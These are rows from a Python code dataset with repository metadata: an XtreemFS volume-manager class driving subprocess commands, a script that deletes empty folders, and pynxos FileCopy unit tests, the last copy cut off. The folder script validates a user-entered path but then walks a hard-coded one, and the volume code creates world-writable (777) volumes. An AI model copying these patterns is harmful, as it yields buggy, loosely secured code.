self.logger.info('Received %s from %s', data, node.id)
return HttpJsonResponse({
'xtreemfs': [ node.id for node in self.nodes ],
})
@expose('POST')
def createDIR(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to create DIR service')
# Just createDIR from all the agents
for node in self.nodes:
data = client.createDIR(node.ip, 5555)
self.logger.info('Received %s from %s', data, node.id)
return HttpJsonResponse({
'xtreemfs': [ node.id for node in self.nodes ],
})
@expose('POST')
def createOSD(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to create OSD service')
# Just createOSD from all the agents
for node in self.nodes:
data = client.createOSD(node.ip, 5555, self.dirNodes[0].ip)
self.logger.info('Received %s from %s', data, node.id)
return HttpJsonResponse({
'xtreemfs': [ node.id for node in self.nodes ],
})
@expose('POST')
def createVolume(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to create Volume')
if not 'volumeName' in kwargs:
return HttpErrorResponse(
'ERROR: Required argument (volumeName) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
# Get the value of 'owner', if specified. 'xtreemfs' otherwise
owner = kwargs.pop('owner', 'xtreemfs')
args = [ 'mkfs.xtreemfs',
'%s:32636/%s' % (self.mrcNodes[0].ip, volumeName),
"-u", owner,
"-g", owner,
"-m", "777" ]
process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to create volume: %s; %s', stdout, stderr)
return HttpErrorResponse("The volume could not be created")
self.logger.info('Creating Volume: %s; %s', stdout, stderr)
return HttpJsonResponse()
@expose('POST')
def deleteVolume(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to delete Volume')
if not 'volumeName' in kwargs:
return HttpErrorResponse(
'ERROR: Required argument (volumeName) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
args = [ 'rmfs.xtreemfs',
'-f',
'%s:32636/%s' % (self.mrcNodes[0].ip, volumeName) ]
process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to delete volume: %s; %s', stdout, stderr)
return HttpErrorResponse("The volume could not be deleted")
self.logger.info('Deleting Volume: %s; %s', stdout, stderr)
# TODO(maybe): issue xtfs_cleanup on all OSDs to free space (or don't and assume xtfs_cleanup is run by a cron job or something)
return HttpJsonResponse()
@expose('GET')
def listVolumes(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpetced')
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to view volumes')
args = [ 'lsfs.xtreemfs', self.mrcNodes[0].ip + ':32636' ]
process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to view volume: %s; %s', stdout, stderr)
return HttpErrorResponse("The volume list cannot be accessed")
return HttpJsonResponse({ 'volumes': stdout })
# NOTE: see xtfsutil for the available policies
@expose('GET')
def list_striping_policies(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpetced')
return HttpJsonResponse({ 'policies': "RAID0" })
@expose('GET')
def list_replication_policies(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpetced')
return HttpJsonResponse({ 'policies': "ronly, WaR1, WqRq" })
@expose('GET')
def list_osd_sel_policies(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpetced')
return HttpJsonResponse({ 'policies': "DEFAULT, FQDN, UUID, DCMAP, VIVALDI" })
@expose('GET')
def list_replica_sel_policies(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpetced')
return HttpJsonResponse({ 'policies': "DEFAULT, FQDN, DCMAP, VIVALDI" })
def set_policy(self, volumeName, policyName, args):
mountPoint = '/tmp/' + volumeName
# mkdir -p <mountpoint>
process = subprocess.Popen(['mkdir', '-p', mountPoint])
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to set %s policy: %s; %s', policyName, stdout, stderr)
return HttpErrorResponse("Failed to set %s policy: %s; %s" % (policyName, stdout, stderr))
# mount.xtreemfs <dir_ip>:32638/<volumename> <mountpoint>
process = subprocess.Popen(['mount.xtreemfs',
'%s:32638/%s' % (self.dirNodes[0].ip, volumeName),
mountPoint],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to set %s policy: %s; %s', policyName, stdout, stderr)
return HttpErrorResponse("Failed to set %s policy: %s; %s" % (policyName, stdout, stderr))
# # with python 2.7
# try:
# # mkdir -p <mountpoint>
# subprocess.check_output(['mkdir', '-p', mountPoint])
# # mount.xtreemfs <dir_ip>:32638/<volumename> <mountpoint>
# subprocess.check_output(['mount.xtreemfs',
# '%s:32638/%s' % (self.dirNodes[0].ip, volumeName),
# mountPoint],
# stdout=subprocess.STDOUT)
# except subprocess.CalledProcessError as e:
# return HttpErrorResponse('ERROR: could not mount volume: ' + e.output)
# xtfsutil <mountpoint> args
process = subprocess.Popen(['xtfsutil', mountPoint] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout_xtfsutil, stderr_xtfsutil) = (stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to set %s policy: %s; %s', policyName, stdout, stderr)
return HttpErrorResponse("Failed to set %s policy: %s; %s" % (policyName, stdout, stderr))
# umount <mountpoint>
process = subprocess.Popen(['umount', mountPoint],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to set %s policy: %s; %s', policyName, stdout, stderr)
return HttpErrorResponse("Failed to set %s policy: %s; %s" % (policyName, stdout, stderr))
# rmdir <mountpoint>
process = subprocess.Popen(['rmdir', mountPoint])
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to set %s policy: %s; %s', policyName, stdout, stderr)
return HttpErrorResponse("Failed to set %s policy: %s; %s" % (policyName, stdout, stderr))
# # with python 2.7
# try:
# # umount <mountpoint>
# subprocess.check_output(['umount', mountPoint])
# # fusermount -u <mountpoint>
# #subprocess.check_output(['fusermount', '-u', mountPoint])
# # rmdir <mountpoint>
# subprocess.check_output(['rmdir', mountPoint])
# except subprocess.CalledProcessError as e:
# return HttpErrorResponse('ERROR: could not unmount volume: ' + e.output)
self.logger.info('Setting %s policy: %s; %s', policyName, stdout_xtfsutil, stderr_xtfsutil)
return HttpJsonResponse({ 'stdout': stdout_xtfsutil })
@expose('POST')
def set_osd_sel_policy(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to set OSD selection policy.')
if not 'volumeName' in kwargs:
return HttpErrorResponse('ERROR: Required argument (volumeName) doesn\'t exist')
if not 'policy' in kwargs:
return HttpErrorResponse('ERROR: Required argument (policy) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
policy = kwargs.pop('policy')
# xtfsutil <path> --set-osp <policy>
args = [ '--set-osp', policy ]
return self.set_policy(volumeName, 'OSD selection', args)
@expose('POST')
def set_replica_sel_policy(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to set Replica selection policy.')
if not 'volumeName' in kwargs:
return HttpErrorResponse('ERROR: Required argument (volumeName) doesn\'t exist')
if not 'policy' in kwargs:
return HttpErrorResponse('ERROR: Required argument (policy) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
policy = kwargs.pop('policy')
# xtfsutil <path> --set-rsp <policy>
args = [ '--set-rsp', policy ]
return self.set_policy(volumeName, 'Replica selection', args)
@expose('POST')
def set_replication_policy(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to set Replication policy.')
if not 'volumeName' in kwargs:
return HttpErrorResponse('ERROR: Required argument (volumeName) doesn\'t exist')
if not 'policy' in kwargs:
return HttpErrorResponse('ERROR: Required argument (policy) doesn\'t exist')
if not 'factor' in kwargs:
return HttpErrorResponse('ERROR: Required argument (factor) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
policy = kwargs.pop('policy')
factor = kwargs.pop('factor')
# xtfsutil <path> --set-drp --replication-policy <policy> --replication-factor <factor>
args = [ '--set-drp',
'--replication-policy', policy,
'--replication-factor', factor ]
return self.set_policy(volumeName, 'Replication', args)
@expose('POST')
def set_striping_policy(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to set Striping policy.')
if not 'volumeName' in kwargs:
return HttpErrorResponse('ERROR: Required argument (volumeName) doesn\'t exist')
if not 'policy' in kwargs:
return HttpErrorResponse('ERROR: Required argument (policy) doesn\'t exist')
if not 'width' in kwargs:
return HttpErrorResponse('ERROR: Required argument (factor) doesn\'t exist')
if not 'stripe-size' in kwargs:
return HttpErrorResponse('ERROR: Required argument (stripe-size) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
policy = kwargs.pop('policy')
width = kwargs.pop('width')
stripe_size = kwargs.pop('stripe-size')
# xtfsutil <path> --set-dsp --striping-policy <policy> --striping-policy-width <width> --striping-policy-stripe-size <stripe-size>
args = [ '--set-dsp',
'--striping-policy', policy,
'--striping-policy-width', width,
'--striping-policy-stripe-size', stripe_size ]
return self.set_policy(volumeName, 'Striping', args)
@expose('POST')
def toggle_persistent(self, kwargs):
self.persistent = not self.persistent
self.logger.debug('toggle_persistent: %s' % self.persistent)
return self.get_service_info({})
@expose('POST')
def set_osd_size(self, kwargs):
if not 'size' in kwargs:
return HttpErrorResponse("ERROR: Required argument (size) doesn't exist")
try:
self.osd_volume_size = int(kwargs['size'])
self.logger.debug('set_osd_size: %s' % self.osd_volume_size)
return self.get_service_info({})
except ValueError:
return HttpErrorResponse("ERROR: Required argument (size) should be an integer")
@expose('POST')
def get_service_snapshot(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse(
'ERROR: Wrong state to get service snapshot.')
self.state = self.S_EPILOGUE
# stop all agent services
self.logger.debug("Stopping all agent services")
self._stop_all(remove=False)
self.logger.debug("Calling get_snapshot on agents")
# dictionary mapping node IDs to tuples of uuids/None (DIR, MRC, OSD)
nodes_snapshot = {}
for node in self.nodes:
if node.id not in nodes_snapshot:
nodes_snapshot[node.id] = {
'data': None,
'dir_uuid': self.dir_node_uuid_map.get(node.id),
'mrc_uuid': self.mrc_node_uuid_map.get(node.id),
'osd_uuid': self.osd_node_uuid_map.get(node.id)
}
try:
# get snapshot from this agent node, independent of what
# XtreemFS services are running there
data = client.get_snapshot(node.ip, 5555)
self.logger.debug('get_snapshot(%s) HTTP code: %s' % (node.ip,
data[0]))
nodes_snapshot[node.id]['data'] = base64.b64encode(data[1])
except client.AgentException:
self.logger.exception('Failed to get snapshot from node %s' %
node)
self.state = self.S_ERROR
raise
# Get ID of attached volume
volume_id = self.osd_uuid_volume_map.get(
nodes_snapshot[node.id]['osd_uuid'])
nodes_snapshot[node.id]['volume'] = volume_id
if volume_id:
volume = self.get_volume(volume_id)
nodes_snapshot[node.id]['cloud'] = volume.cloud.cloud_name
for key in 'dir_uuid', 'mrc_uuid', 'osd_uuid', 'volume':
self.logger.debug("nodes_snapshot[%s]['%s']: %s" % (node.id,
key, nodes_snapshot[node.id][key]))
self.logger.debug("Shutting all agents down")
self._do_shutdown(stop_services=False)
return HttpJsonResponse(nodes_snapshot.values())
@expose('POST')
def set_service_snapshot(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse(
'ERROR: Wrong state to set service snapshot.')
if not 'nodes' in kwargs:
return HttpErrorResponse(
"ERROR: Required argument (nodes) doesn't exist")
nodes = kwargs['nodes']
if len(nodes) != len(self.nodes):
err = "set_service_snapshot: len(nodes) != len(self.nodes)"
self.logger.error(err)
return HttpErrorResponse(err)
self.logger.info("set_service_snapshot: stopping all agent services")
# rewriting state
self.osdNodes = []
self.mrcNodes = []
self.dirNodes = []
self.dir_node_uuid_map = {}
self.mrc_node_uuid_map = {}
self.osd_node_uuid_map = {}
self.osd_uuid_volume_map = {}
for node, data in zip(self.nodes, nodes):
volumeid = data.get('volume')
osd_uuid = data.get('osd_uuid')
mrc_uuid = data.get('mrc_uuid')
dir_uuid = data.get('dir_uuid')
# If this is a dir node
if dir_uuid:
self.dir_node_uuid_map[node.id] = dir_uuid
self.dirNodes.append(node)
# If this is a mrc node
if mrc_uuid:
self.mrc_node_uuid_map[node.id] = mrc_uuid
self.mrcNodes.append(node)
# If this is an OSD node
if osd_uuid:
self.osd_node_uuid_map[node.id] = osd_uuid
self.osdNodes.append(node)
if volumeid:
self.osd_uuid_volume_map[osd_uuid] = volumeid
try:
self.get_volume(volumeid)
except Exception:
# This volume is not in the list of known ones.
volumeCloud = self._init_cloud(data.get('cloud'))
class volume:
id = volumeid
cloud = volumeCloud
self.volumes.append(volume)
# Regardless of node type, restore metadata
try:
self.logger.info('set_service_snapshot: restoring %s' %
node.ip)
data = client.set_snapshot(node.ip, 5555, data['archive'])
except client.AgentException, err:
self.logger.exception(err)
raise err
self.logger.info("set_service_snapshot: starting all agent services")
self._start_all()
self.logger.info("set_service_snapshot: all agent services started")
return HttpJsonResponse()
| 0
| 20,025
| 0
| 17,521
| 0
| 109
| 0
| 134
| 250
|
a3c424cf728d4c2ef3a50ff9cfcd26a82c1360fa
| 505
|
py
|
Python
|
Python/delete_empty_folders/script.py
|
Ian-Yy/code-n-stitch
|
20fc8784bf51bd3e36329d1ca44b0be6dc66fae6
|
[
"MIT"
] | 50
|
2020-09-19T16:40:21.000Z
|
2022-02-05T05:48:42.000Z
|
Python/delete_empty_folders/script.py
|
Ian-Yy/code-n-stitch
|
20fc8784bf51bd3e36329d1ca44b0be6dc66fae6
|
[
"MIT"
] | 266
|
2020-09-25T17:24:04.000Z
|
2021-11-29T07:17:57.000Z
|
Python/delete_empty_folders/script.py
|
Ian-Yy/code-n-stitch
|
20fc8784bf51bd3e36329d1ca44b0be6dc66fae6
|
[
"MIT"
] | 113
|
2020-09-26T10:28:11.000Z
|
2021-10-15T06:58:53.000Z
|
import os
import sys
# enter path to the directory with the files
x = input('Absolute path of folder, from which empty subfolders are to be removed: ')
# check if path is valid
if not os.path.exists(x):
print('Invalid path\nTerminating program')
sys.exit()
# cleanup of empty subfolders
walk = list(os.walk('/home/naman/Desktop/del_folders/folder_struct'))
for path, folders, files in walk:
if (len(folders) == 0) and (len(files) == 0):
os.rmdir(path)
print(f'Removed empty directory: {path}')
| 26.578947
| 85
| 0.720792
|
import os
import sys
# enter path to the directory with the files
x = input('Absolute path of folder, from which empty subfolders are to be removed: ')
# check if path is valid
if not os.path.exists(x):
print('Invalid path\nTerminating program')
sys.exit()
# cleanup of empty subfolders
walk = list(os.walk('/home/naman/Desktop/del_folders/folder_struct'))
for path, folders, files in walk:
if (len(folders) == 0) and (len(files) == 0):
os.rmdir(path)
print(f'Removed empty directory: {path}')
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0a5858e6445232a1bc20db7f822c0cac94845b29
| 21,764
|
py
|
Python
|
test/unit/test_file_copy.py
|
networktocode/pynxos
|
6ee22d52e5a0f0ae2e6b96b0c1ce158c30eb75e9
|
[
"Apache-2.0"
] | 14
|
2016-04-17T19:03:15.000Z
|
2021-04-06T13:04:23.000Z
|
test/unit/test_file_copy.py
|
networktocode/pynxos
|
6ee22d52e5a0f0ae2e6b96b0c1ce158c30eb75e9
|
[
"Apache-2.0"
] | 8
|
2016-02-02T23:44:12.000Z
|
2019-02-15T20:20:20.000Z
|
test/unit/test_file_copy.py
|
networktocode/pynxos
|
6ee22d52e5a0f0ae2e6b96b0c1ce158c30eb75e9
|
[
"Apache-2.0"
] | 17
|
2016-04-17T19:03:17.000Z
|
2021-04-05T09:55:43.000Z
|
import unittest
if __name__ == "__main__":
unittest.main()
| 91.445378
| 3,856
| 0.66826
|
import unittest
import mock
from tempfile import NamedTemporaryFile
from pynxos.features.file_copy import FileCopy, FileTransferError
class FileCopyTestCase(unittest.TestCase):
@mock.patch('pynxos.device.Device', autospec=True)
def setUp(self, mock_device):
self.device = mock_device
self.device.host = 'host'
self.device.username = 'user'
self.device.password = 'pass'
self.fc = FileCopy(self.device, '/path/to/source_file')
def test_init(self):
self.assertEqual(self.fc.device, self.device)
self.assertEqual(self.fc.src, '/path/to/source_file')
self.assertEqual(self.fc.dst, 'source_file')
self.assertEqual(self.fc.port, 22)
self.assertEqual(self.fc.file_system, 'bootflash:')
def test_get_remote_size(self):
self.device.show.return_value = ' 4096 Mar 15 17:06:51 2016 .rpmstore/\n 3651 May 19 18:26:19 2014 20140519_182619_poap_6121_init.log\n 3651 May 19 18:34:38 2014 20140519_183438_poap_5884_init.log\n 23167 Jul 11 19:55:32 2014 20140711_195320_poap_5884_init.log\n 3735 Oct 09 18:00:43 2015 20151009_180036_poap_6291_init.log\n 2826 Oct 12 20:17:32 2015 abc\n 7160 Oct 06 13:49:57 2015 cfg_flowtracker1\n 7123 Oct 08 19:26:48 2015 cfg_flowtracker1_2\n 89620 Oct 09 18:04:41 2015 clean_n9k2_all_cfg\n 2773 Oct 09 18:04:18 2015 clean_n9k2_cfg\n 17339 Oct 09 19:58:44 2015 clean_n9k2_cp\n 18203 Oct 12 19:41:21 2015 clean_n9k2_cp2\n 18118 Oct 12 21:03:57 2015 config_2015-10-12_17:03:46.308598\n 18118 Oct 12 21:03:58 2015 config_2015-10-12_17:03:47.338797\n 18118 Oct 12 21:04:03 2015 config_2015-10-12_17:03:52.012664\n 18118 Oct 12 21:06:17 2015 config_2015-10-12_17:06:05.026284\n 18118 Oct 12 21:07:03 2015 config_2015-10-12_17:06:50.357353\n 18118 Oct 12 21:08:13 2015 config_2015-10-12_17:08:01.145064\n 18118 Oct 12 21:12:55 2015 config_2015-10-12_17:12:43.603017\n 18118 Oct 12 21:13:38 2015 config_2015-10-12_17:13:25.476126\n 18098 Oct 12 21:14:40 2015 config_2015-10-12_17:14:29.411540\n 18118 Oct 12 21:14:43 2015 config_2015-10-12_17:14:32.442546\n 18099 Oct 12 21:14:46 2015 config_2015-10-12_17:14:35.595983\n 18118 Oct 12 21:16:03 2015 config_2015-10-12_17:15:51.501546\n 18118 Oct 12 21:16:20 2015 config_2015-10-12_17:16:09.478200\n 18118 Oct 12 21:16:21 2015 config_2015-10-12_17:16:10.613538\n 18099 Oct 12 21:16:25 2015 config_2015-10-12_17:16:13.730374\n 18118 Oct 12 21:16:30 2015 config_2015-10-12_17:16:18.856276\n 18118 Oct 12 21:16:36 2015 config_2015-10-12_17:16:24.817255\n 4096 Jan 11 20:00:40 2016 configs/\n 5365 Feb 05 15:57:55 2015 configs:jaay.cfg\n 5365 Feb 05 15:51:31 2015 configs:jay.cfg\n 18061 Oct 09 19:12:42 2015 cp_with_shutdown\n 154 Feb 19 21:33:05 2015 eth3.cfg\n 65 Feb 19 21:18:28 2015 eth_1_1.cfg\n 4096 Aug 10 18:54:09 2015 home/\n 18111 Oct 12 20:30:41 2015 initial.conf\n 4096 Mar 15 15:42:22 2016 lost+found/\n 309991424 May 19 18:23:41 2014 n9000-dk9.6.1.2.I2.1.bin\n 353457152 Nov 02 15:14:40 2014 n9000-dk9.6.1.2.I3.1.bin\n 37612335 Nov 02 15:20:00 2014 n9000-epld.6.1.2.I3.1.img\n 9888 Oct 08 18:35:39 2015 n9k1_cfg\n 73970 Oct 09 16:30:54 2015 n9k2_all_cfg\n 7105 Oct 08 19:48:41 2015 n9k2_cfg\n 7142 Oct 08 18:49:19 2015 n9k2_cfg_safe\n 21293 Oct 09 17:16:57 2015 n9k2_cp\n 4096 Aug 10 20:17:35 2015 netmiko/\n 18187 Oct 12 20:31:20 2015 new_typo.conf\n 17927 Oct 12 18:25:40 2015 newcpfile\n 535352320 Mar 15 15:39:31 2016 nxos.7.0.3.I2.1.bin\n 4096 Jan 28 15:33:36 2015 onep/\n 6079 Oct 06 14:46:33 2015 pn9k1_cfg.bak\n 54466560 Jan 28 12:48:30 2015 puppet-1.0.0-nx-os-SPA-k9.ova\n 9698 Sep 19 05:43:12 2014 sart\n 4096 Feb 05 15:15:30 2015 scriaspts/\n 4096 Feb 05 15:09:35 2015 scripts/\n 3345 Feb 19 21:04:50 2015 standardconfig.cfg\n 21994 Oct 23 15:32:18 2015 travis_ping\n 18038 Oct 12 19:32:17 2015 tshootcp\n 4096 Mar 15 15:48:59 2016 virt_strg_pool_bf_vdc_1/\n 4096 Jan 28 15:30:29 2015 virtual-instance/\n 125 Mar 15 15:48:12 2016 virtual-instance.conf\n 2068 Mar 16 09:58:23 2016 vlan.dat\nUsage for bootflash://sup-local\n 2425626624 bytes used\n19439792128 bytes free\n21865418752 bytes total\n'
result = self.fc.get_remote_size()
expected = 19439792128
self.assertEqual(result, expected)
self.device.show.assert_called_with('dir bootflash:', raw_text=True)
@mock.patch('os.path.getsize')
def test_enough_space(self, mock_getsize):
self.device.show.return_value = ' 4096 Mar 15 17:06:51 2016 .rpmstore/\n 3651 May 19 18:26:19 2014 20140519_182619_poap_6121_init.log\n 3651 May 19 18:34:38 2014 20140519_183438_poap_5884_init.log\n 23167 Jul 11 19:55:32 2014 20140711_195320_poap_5884_init.log\n 3735 Oct 09 18:00:43 2015 20151009_180036_poap_6291_init.log\n 2826 Oct 12 20:17:32 2015 abc\n 7160 Oct 06 13:49:57 2015 cfg_flowtracker1\n 7123 Oct 08 19:26:48 2015 cfg_flowtracker1_2\n 89620 Oct 09 18:04:41 2015 clean_n9k2_all_cfg\n 2773 Oct 09 18:04:18 2015 clean_n9k2_cfg\n 17339 Oct 09 19:58:44 2015 clean_n9k2_cp\n 18203 Oct 12 19:41:21 2015 clean_n9k2_cp2\n 18118 Oct 12 21:03:57 2015 config_2015-10-12_17:03:46.308598\n 18118 Oct 12 21:03:58 2015 config_2015-10-12_17:03:47.338797\n 18118 Oct 12 21:04:03 2015 config_2015-10-12_17:03:52.012664\n 18118 Oct 12 21:06:17 2015 config_2015-10-12_17:06:05.026284\n 18118 Oct 12 21:07:03 2015 config_2015-10-12_17:06:50.357353\n 18118 Oct 12 21:08:13 2015 config_2015-10-12_17:08:01.145064\n 18118 Oct 12 21:12:55 2015 config_2015-10-12_17:12:43.603017\n 18118 Oct 12 21:13:38 2015 config_2015-10-12_17:13:25.476126\n 18098 Oct 12 21:14:40 2015 config_2015-10-12_17:14:29.411540\n 18118 Oct 12 21:14:43 2015 config_2015-10-12_17:14:32.442546\n 18099 Oct 12 21:14:46 2015 config_2015-10-12_17:14:35.595983\n 18118 Oct 12 21:16:03 2015 config_2015-10-12_17:15:51.501546\n 18118 Oct 12 21:16:20 2015 config_2015-10-12_17:16:09.478200\n 18118 Oct 12 21:16:21 2015 config_2015-10-12_17:16:10.613538\n 18099 Oct 12 21:16:25 2015 config_2015-10-12_17:16:13.730374\n 18118 Oct 12 21:16:30 2015 config_2015-10-12_17:16:18.856276\n 18118 Oct 12 21:16:36 2015 config_2015-10-12_17:16:24.817255\n 4096 Jan 11 20:00:40 2016 configs/\n 5365 Feb 05 15:57:55 2015 configs:jaay.cfg\n 5365 Feb 05 15:51:31 2015 configs:jay.cfg\n 18061 Oct 09 19:12:42 2015 cp_with_shutdown\n 154 Feb 19 21:33:05 2015 eth3.cfg\n 65 Feb 19 21:18:28 2015 eth_1_1.cfg\n 4096 Aug 10 18:54:09 2015 home/\n 18111 Oct 12 20:30:41 2015 initial.conf\n 4096 Mar 15 15:42:22 2016 lost+found/\n 309991424 May 19 18:23:41 2014 n9000-dk9.6.1.2.I2.1.bin\n 353457152 Nov 02 15:14:40 2014 n9000-dk9.6.1.2.I3.1.bin\n 37612335 Nov 02 15:20:00 2014 n9000-epld.6.1.2.I3.1.img\n 9888 Oct 08 18:35:39 2015 n9k1_cfg\n 73970 Oct 09 16:30:54 2015 n9k2_all_cfg\n 7105 Oct 08 19:48:41 2015 n9k2_cfg\n 7142 Oct 08 18:49:19 2015 n9k2_cfg_safe\n 21293 Oct 09 17:16:57 2015 n9k2_cp\n 4096 Aug 10 20:17:35 2015 netmiko/\n 18187 Oct 12 20:31:20 2015 new_typo.conf\n 17927 Oct 12 18:25:40 2015 newcpfile\n 535352320 Mar 15 15:39:31 2016 nxos.7.0.3.I2.1.bin\n 4096 Jan 28 15:33:36 2015 onep/\n 6079 Oct 06 14:46:33 2015 pn9k1_cfg.bak\n 54466560 Jan 28 12:48:30 2015 puppet-1.0.0-nx-os-SPA-k9.ova\n 9698 Sep 19 05:43:12 2014 sart\n 4096 Feb 05 15:15:30 2015 scriaspts/\n 4096 Feb 05 15:09:35 2015 scripts/\n 3345 Feb 19 21:04:50 2015 standardconfig.cfg\n 21994 Oct 23 15:32:18 2015 travis_ping\n 18038 Oct 12 19:32:17 2015 tshootcp\n 4096 Mar 15 15:48:59 2016 virt_strg_pool_bf_vdc_1/\n 4096 Jan 28 15:30:29 2015 virtual-instance/\n 125 Mar 15 15:48:12 2016 virtual-instance.conf\n 2068 Mar 16 09:58:23 2016 vlan.dat\nUsage for bootflash://sup-local\n 2425626624 bytes used\n19439792128 bytes free\n21865418752 bytes total\n'
mock_getsize.return_value = 10
result = self.fc.enough_remote_space()
self.assertEqual(result, True)
mock_getsize.assert_called_with('/path/to/source_file')
@mock.patch('os.path.getsize')
def test_not_enough_space(self, mock_getsize):
self.device.show.return_value = ' 4096 Mar 15 17:06:51 2016 .rpmstore/\n 3651 May 19 18:26:19 2014 20140519_182619_poap_6121_init.log\n 3651 May 19 18:34:38 2014 20140519_183438_poap_5884_init.log\n 23167 Jul 11 19:55:32 2014 20140711_195320_poap_5884_init.log\n 3735 Oct 09 18:00:43 2015 20151009_180036_poap_6291_init.log\n 2826 Oct 12 20:17:32 2015 abc\n 7160 Oct 06 13:49:57 2015 cfg_flowtracker1\n 7123 Oct 08 19:26:48 2015 cfg_flowtracker1_2\n 89620 Oct 09 18:04:41 2015 clean_n9k2_all_cfg\n 2773 Oct 09 18:04:18 2015 clean_n9k2_cfg\n 17339 Oct 09 19:58:44 2015 clean_n9k2_cp\n 18203 Oct 12 19:41:21 2015 clean_n9k2_cp2\n 18118 Oct 12 21:03:57 2015 config_2015-10-12_17:03:46.308598\n 18118 Oct 12 21:03:58 2015 config_2015-10-12_17:03:47.338797\n 18118 Oct 12 21:04:03 2015 config_2015-10-12_17:03:52.012664\n 18118 Oct 12 21:06:17 2015 config_2015-10-12_17:06:05.026284\n 18118 Oct 12 21:07:03 2015 config_2015-10-12_17:06:50.357353\n 18118 Oct 12 21:08:13 2015 config_2015-10-12_17:08:01.145064\n 18118 Oct 12 21:12:55 2015 config_2015-10-12_17:12:43.603017\n 18118 Oct 12 21:13:38 2015 config_2015-10-12_17:13:25.476126\n 18098 Oct 12 21:14:40 2015 config_2015-10-12_17:14:29.411540\n 18118 Oct 12 21:14:43 2015 config_2015-10-12_17:14:32.442546\n 18099 Oct 12 21:14:46 2015 config_2015-10-12_17:14:35.595983\n 18118 Oct 12 21:16:03 2015 config_2015-10-12_17:15:51.501546\n 18118 Oct 12 21:16:20 2015 config_2015-10-12_17:16:09.478200\n 18118 Oct 12 21:16:21 2015 config_2015-10-12_17:16:10.613538\n 18099 Oct 12 21:16:25 2015 config_2015-10-12_17:16:13.730374\n 18118 Oct 12 21:16:30 2015 config_2015-10-12_17:16:18.856276\n 18118 Oct 12 21:16:36 2015 config_2015-10-12_17:16:24.817255\n 4096 Jan 11 20:00:40 2016 configs/\n 5365 Feb 05 15:57:55 2015 configs:jaay.cfg\n 5365 Feb 05 15:51:31 2015 configs:jay.cfg\n 18061 Oct 09 19:12:42 2015 cp_with_shutdown\n 154 Feb 19 21:33:05 2015 eth3.cfg\n 65 Feb 19 21:18:28 2015 eth_1_1.cfg\n 4096 Aug 10 18:54:09 2015 home/\n 18111 Oct 12 20:30:41 2015 initial.conf\n 4096 Mar 15 15:42:22 2016 lost+found/\n 309991424 May 19 18:23:41 2014 n9000-dk9.6.1.2.I2.1.bin\n 353457152 Nov 02 15:14:40 2014 n9000-dk9.6.1.2.I3.1.bin\n 37612335 Nov 02 15:20:00 2014 n9000-epld.6.1.2.I3.1.img\n 9888 Oct 08 18:35:39 2015 n9k1_cfg\n 73970 Oct 09 16:30:54 2015 n9k2_all_cfg\n 7105 Oct 08 19:48:41 2015 n9k2_cfg\n 7142 Oct 08 18:49:19 2015 n9k2_cfg_safe\n 21293 Oct 09 17:16:57 2015 n9k2_cp\n 4096 Aug 10 20:17:35 2015 netmiko/\n 18187 Oct 12 20:31:20 2015 new_typo.conf\n 17927 Oct 12 18:25:40 2015 newcpfile\n 535352320 Mar 15 15:39:31 2016 nxos.7.0.3.I2.1.bin\n 4096 Jan 28 15:33:36 2015 onep/\n 6079 Oct 06 14:46:33 2015 pn9k1_cfg.bak\n 54466560 Jan 28 12:48:30 2015 puppet-1.0.0-nx-os-SPA-k9.ova\n 9698 Sep 19 05:43:12 2014 sart\n 4096 Feb 05 15:15:30 2015 scriaspts/\n 4096 Feb 05 15:09:35 2015 scripts/\n 3345 Feb 19 21:04:50 2015 standardconfig.cfg\n 21994 Oct 23 15:32:18 2015 travis_ping\n 18038 Oct 12 19:32:17 2015 tshootcp\n 4096 Mar 15 15:48:59 2016 virt_strg_pool_bf_vdc_1/\n 4096 Jan 28 15:30:29 2015 virtual-instance/\n 125 Mar 15 15:48:12 2016 virtual-instance.conf\n 2068 Mar 16 09:58:23 2016 vlan.dat\nUsage for bootflash://sup-local\n 2425626624 bytes 